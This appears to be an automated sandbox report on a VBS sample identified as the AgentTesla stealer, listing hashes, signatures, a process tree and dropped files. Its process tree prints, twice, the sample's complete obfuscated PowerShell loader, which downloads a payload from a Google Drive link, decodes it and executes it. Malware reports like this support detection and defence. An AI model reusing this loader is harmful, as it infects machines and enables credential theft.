Overview

overview

10

Static

static

1

836259b5e4...e6.vbs

windows7-x64

10

836259b5e4...e6.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 01:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    836259b5e47a4d9f6fdd2955e69645b8aa70bca6d139b0eb99038641db38dbe6.vbs

  • Size

    5KB

  • MD5

    4f71bc91cc015856a2a5029d880f02f0

  • SHA1

    3f9e609f67057c573a15f469e4bb5e64c571174c

  • SHA256

    836259b5e47a4d9f6fdd2955e69645b8aa70bca6d139b0eb99038641db38dbe6

  • SHA512

    30de245e61fd2cf7462a9e4949a04acfd17da6ffd074886d440b11f76bc4c28b336a9a5ced2785695fa8049348cc152d35b43ab487ff193e6f001a3d23243c38

  • SSDEEP

    96:Q7ZrI+0JYJMAAiOL1vOZypNWiu/hlbz9cZh+xFUMLCT0MTUmdrQfp:Q150+GAAlOZypNWiu/hlPahKLCQMUhfp

Score
10/10
agentteslakeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
  • Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\836259b5e47a4d9f6fdd2955e69645b8aa70bca6d139b0eb99038641db38dbe6.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semistarved = 1;$Fortrnges='Sub';$Fortrnges+='strin';$Fortrnges+='g';Function Bogievognenes83($Bldgringsmidler89){$Lovgav=$Bldgringsmidler89.Length-$Semistarved;For($Twentythree=1;$Twentythree -lt $Lovgav;$Twentythree+=2){$Irrigably+=$Bldgringsmidler89.$Fortrnges.Invoke( $Twentythree, $Semistarved);}$Irrigably;}function Kalkbrnderens($Chokprisers){.($Posedes) ($Chokprisers);}$Vgavis=Bogievognenes83 '.M,oIz i lElUaB/,5 . 0p ( W iin dKo.wSsT ,NhT, I1S0W. 0 ;E SW iHnI6.4p;A Ex 6P4,;D ,rFvE: 1,2U1,. 0O)D .GCe.c,k oV/D2 0S1 0N0V1R0m1L .F,iEr.e fgoPx,/H1r2,1 .v0B ';$Discrowning136=Bogievognenes83 'OU sGe r.-LASgSe,n tL ';$oplagre=Bogievognenes83 'BhGtUt.pSs :C/k/IdPrHiSv eL.Pg odoTgSl ev. c oMm./FuGcB?aeBx.p.o.rWtP=Sd,o wTnEl,oSa d.& i d,= 1R0GUGUce.zNT,z p HBZKcFo.M.wNW asrB5OfULOvRh.K jRmtqUrF0S1 mAbSfT ';$Flitwite=Bogievognenes83 'M>L ';$Posedes=Bogievognenes83 'TiSeAx ';$Bothriums='Eksemplarers';$Spatheful26 = Bogievognenes83 'De,cSh,oS % aDpSp,dFaAt.a %B\ RLuAhCa,a,rJe d e .STAa.lP &,&c IeScOh.oD tL ';Kalkbrnderens (Bogievognenes83 ' $,g l.o bEa l :UF o cBu.sFePsS= (,c mSd ./ cR $CSFp.aTt.hCe f,uPlO2D6,). ');Kalkbrnderens (Bogievognenes83 'B$ g lSo b aMl,: K a rMlGetk aSm rKe tF=P$Uo.pIl aHgIrPe,. s.p,l i t (,$IFVlGiDt w,iDt,eB) ');$oplagre=$Karlekamret[0];$Topvinklers= (Bogievognenes83 'F$TgBlIo bTaDlS:,S.oMlOoTeIr s,=ENPeBw,-AO b j,e,c t CSWyEsTt eLm .TNFe.t . WLe b C lci eUn,t');$Topvinklers+=$Focuses[1];Kalkbrnderens ($Topvinklers);Kalkbrnderens (Bogievognenes83 ' $ SWoBlGote rTsK.RH.e a dUeOr s [U$SDDi sFc rRoOw.ndiTnSg,1.3 6I].=S$BVPgEaBvIi.s ');$Rejen=Bogievognenes83 'T$DS,o lFo eNrSsp. DSoDwAn l oMaBd F.iGlOe.(N$Lo psl,aVg r,eS,D$DMOe gBa,lso,m.aMnbi cE) ';$Megalomanic=$Focuses[0];Kalkbrnderens (Bogievognenes83 ',$Pg lHo.bPaWlS:UWOhTiPsIkAiEnT=P(BTIe,sFtS- PHa t h .$ MSeAgEa,l o mPa n iMc,), ');while (!$Whiskin) {Kalkbrnderens (Bogievognenes83 ',$FgQl,oIbSa l :EFBo.rKt.u.n,aCtBe.lHy =S$,tVr,uSe ') ;Kalkbrnderens $Rejen;Kalkbrnderens (Bogievognenes83 ' S tAaBrOtA- S.l,e.eOpB 4 ');Kalkbrnderens (Bogievognenes83 'I$.g l,oSbNa.l,:VWKheiBs.k i nM= ( Tte sIt - PKaPt h, B$ M,eMgDaBlRoDmuaPn isc.), ') ;Kalkbrnderens (Bogievognenes83 'H$ gLlKoSb,aSlB: BBeSn vBa r m eSr ndeusN=P$bg,lAoLbra,l,: tFeSl eGf oPtGoPe t +D+,%.$ K aSr lSeHk aKmOrTeFt .Vc o uUn t, ') ;$oplagre=$Karlekamret[$Benvarmernes];}$Taximeters=346626;$resummon=26683;Kalkbrnderens (Bogievognenes83 'N$ gSl o b aPlD:PCPoMnWdPoUtSt iSe rBi. =G ,GSe.tV-CCCoCnmt e n.t, .$ MFe.gSaBl,oUmHa.n,isc ');Kalkbrnderens (Bogievognenes83 ' $Sg l.oAb a,l :NSStUrCaNnUg lBe,mfeAn tU R=C [AS,y s.tSe mD.HCgo nIvCe r t,]E: : FUrSo.mABFa s eS6 4PSBtSrLi n,gA(S$FC oTnLdSo t tMiKe.rAi,). ');Kalkbrnderens (Bogievognenes83 ' $SgDlLo b aRl : C hAa.m.b,e r e d, =F H[ESby s.t.eRm .TT eFx tC. E.n c,oUd i nBg,]T:O:HA,S CMITIT.,GFeMtKS t rri n.gX(.$FS tSrFaDn gHl e mAe,n tI) ');Kalkbrnderens (Bogievognenes83 'B$.g,l.o.bra lO:,VNaRlFu,t aMkJuLr sOe rS=.$.C h a mAb e,r eCd .Ls u,bHsStrrFiSnMgU(.$.T.aBxSi mMe,t eMr sB, $ r e s u,m,mPoKn ), ');Kalkbrnderens $Valutakurser;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ruhaarede.Tal && echo t"
        3⤵
          PID:2580
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semistarved = 1;$Fortrnges='Sub';$Fortrnges+='strin';$Fortrnges+='g';Function Bogievognenes83($Bldgringsmidler89){$Lovgav=$Bldgringsmidler89.Length-$Semistarved;For($Twentythree=1;$Twentythree -lt $Lovgav;$Twentythree+=2){$Irrigably+=$Bldgringsmidler89.$Fortrnges.Invoke( $Twentythree, $Semistarved);}$Irrigably;}function Kalkbrnderens($Chokprisers){.($Posedes) ($Chokprisers);}$Vgavis=Bogievognenes83 '.M,oIz i lElUaB/,5 . 0p ( W iin dKo.wSsT ,NhT, I1S0W. 0 ;E SW iHnI6.4p;A Ex 6P4,;D ,rFvE: 1,2U1,. 0O)D .GCe.c,k oV/D2 0S1 0N0V1R0m1L .F,iEr.e fgoPx,/H1r2,1 .v0B ';$Discrowning136=Bogievognenes83 'OU sGe r.-LASgSe,n tL ';$oplagre=Bogievognenes83 'BhGtUt.pSs :C/k/IdPrHiSv eL.Pg odoTgSl ev. c oMm./FuGcB?aeBx.p.o.rWtP=Sd,o wTnEl,oSa d.& i d,= 1R0GUGUce.zNT,z p HBZKcFo.M.wNW asrB5OfULOvRh.K jRmtqUrF0S1 mAbSfT ';$Flitwite=Bogievognenes83 'M>L ';$Posedes=Bogievognenes83 'TiSeAx ';$Bothriums='Eksemplarers';$Spatheful26 = Bogievognenes83 'De,cSh,oS % aDpSp,dFaAt.a %B\ RLuAhCa,a,rJe d e .STAa.lP &,&c IeScOh.oD tL ';Kalkbrnderens (Bogievognenes83 ' $,g l.o bEa l :UF o cBu.sFePsS= (,c mSd ./ cR $CSFp.aTt.hCe f,uPlO2D6,). ');Kalkbrnderens (Bogievognenes83 'B$ g lSo b aMl,: K a rMlGetk aSm rKe tF=P$Uo.pIl aHgIrPe,. s.p,l i t (,$IFVlGiDt w,iDt,eB) ');$oplagre=$Karlekamret[0];$Topvinklers= (Bogievognenes83 'F$TgBlIo bTaDlS:,S.oMlOoTeIr s,=ENPeBw,-AO b j,e,c t CSWyEsTt eLm .TNFe.t . WLe b C lci eUn,t');$Topvinklers+=$Focuses[1];Kalkbrnderens ($Topvinklers);Kalkbrnderens (Bogievognenes83 ' $ SWoBlGote rTsK.RH.e a dUeOr s [U$SDDi sFc rRoOw.ndiTnSg,1.3 6I].=S$BVPgEaBvIi.s ');$Rejen=Bogievognenes83 'T$DS,o lFo eNrSsp. DSoDwAn l oMaBd F.iGlOe.(N$Lo psl,aVg r,eS,D$DMOe gBa,lso,m.aMnbi cE) ';$Megalomanic=$Focuses[0];Kalkbrnderens (Bogievognenes83 ',$Pg lHo.bPaWlS:UWOhTiPsIkAiEnT=P(BTIe,sFtS- PHa t h .$ MSeAgEa,l o mPa n iMc,), ');while (!$Whiskin) {Kalkbrnderens (Bogievognenes83 ',$FgQl,oIbSa l :EFBo.rKt.u.n,aCtBe.lHy =S$,tVr,uSe ') ;Kalkbrnderens $Rejen;Kalkbrnderens (Bogievognenes83 ' S tAaBrOtA- S.l,e.eOpB 4 ');Kalkbrnderens (Bogievognenes83 'I$.g l,oSbNa.l,:VWKheiBs.k i nM= ( Tte sIt - PKaPt h, B$ M,eMgDaBlRoDmuaPn isc.), ') ;Kalkbrnderens (Bogievognenes83 'H$ gLlKoSb,aSlB: BBeSn vBa r m eSr ndeusN=P$bg,lAoLbra,l,: tFeSl eGf oPtGoPe t +D+,%.$ K aSr lSeHk aKmOrTeFt .Vc o uUn t, ') ;$oplagre=$Karlekamret[$Benvarmernes];}$Taximeters=346626;$resummon=26683;Kalkbrnderens (Bogievognenes83 'N$ gSl o b aPlD:PCPoMnWdPoUtSt iSe rBi. =G ,GSe.tV-CCCoCnmt e n.t, .$ MFe.gSaBl,oUmHa.n,isc ');Kalkbrnderens (Bogievognenes83 ' $Sg l.oAb a,l :NSStUrCaNnUg lBe,mfeAn tU R=C [AS,y s.tSe mD.HCgo nIvCe r t,]E: : FUrSo.mABFa s eS6 4PSBtSrLi n,gA(S$FC oTnLdSo t tMiKe.rAi,). ');Kalkbrnderens (Bogievognenes83 ' $SgDlLo b aRl : C hAa.m.b,e r e d, =F H[ESby s.t.eRm .TT eFx tC. E.n c,oUd i nBg,]T:O:HA,S CMITIT.,GFeMtKS t rri n.gX(.$FS tSrFaDn gHl e mAe,n tI) ');Kalkbrnderens (Bogievognenes83 'B$.g,l.o.bra lO:,VNaRlFu,t aMkJuLr sOe rS=.$.C h a mAb e,r eCd .Ls u,bHsStrrFiSnMgU(.$.T.aBxSi mMe,t eMr sB, $ r e s u,m,mPoKn ), ');Kalkbrnderens $Valutakurser;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2424
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ruhaarede.Tal && echo t"
            4⤵
              PID:1520
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2148

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V4Y6EVEN6HQQXV9YIULX.temp
        Filesize

        7KB

        MD5

        68f880dfb89301b3a6360f482ef1cde2

        SHA1

        6edacccb52e30393081a35c336ca61e9c236b500

        SHA256

        350f09cb9c135daa9652020ecc63bbffa69a7f5ec4e9b2ccabe69a780942f092

        SHA512

        a47addcc57a0291a7be8200ec6411d45556c52f9485201e89066a7fcbaa109f70af4399b8cf985b807dc4a334fddc500731a8a70082c813b598bbb37720b96ca

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Ruhaarede.Tal
        Filesize

        486KB

        MD5

        1bfa03c6f53315482c87ac075d5e4898

        SHA1

        e2252b3662c2989cef2233e1d5fa7554bf8e5bd8

        SHA256

        806ff71ceaf81fe7073d40617e7ccb34e4e9430fcccb5469c88e195e3c68eaf2

        SHA512

        47e7a36d739e740f0b2d89694c1c670315b9efc29c4a710ddfab5f6aa2cdcbaaad605eec17ef33e3b53c2023a112eb2de09c3be6c2f6e59df404d337e68255a8

        Download Submit

      • memory/2148-21-0x00000000004F0000-0x0000000001552000-memory.dmp

        Filesize

        16.4MB

        Download

      • memory/2148-45-0x00000000004F0000-0x0000000000532000-memory.dmp

        Filesize

        264KB

        Download

      • memory/2148-43-0x00000000004F0000-0x0000000001552000-memory.dmp

        Filesize

        16.4MB

        Download

      • memory/2424-20-0x0000000006170000-0x0000000009201000-memory.dmp

        Filesize

        48.6MB

        Download

      • memory/2744-16-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2744-6-0x0000000002410000-0x0000000002418000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2744-5-0x000000001B360000-0x000000001B642000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2744-7-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2744-17-0x000007FEF579E000-0x000007FEF579F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2744-10-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2744-4-0x000007FEF579E000-0x000007FEF579F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2744-9-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2744-44-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2744-8-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

        Filesize

        9.6MB

        Download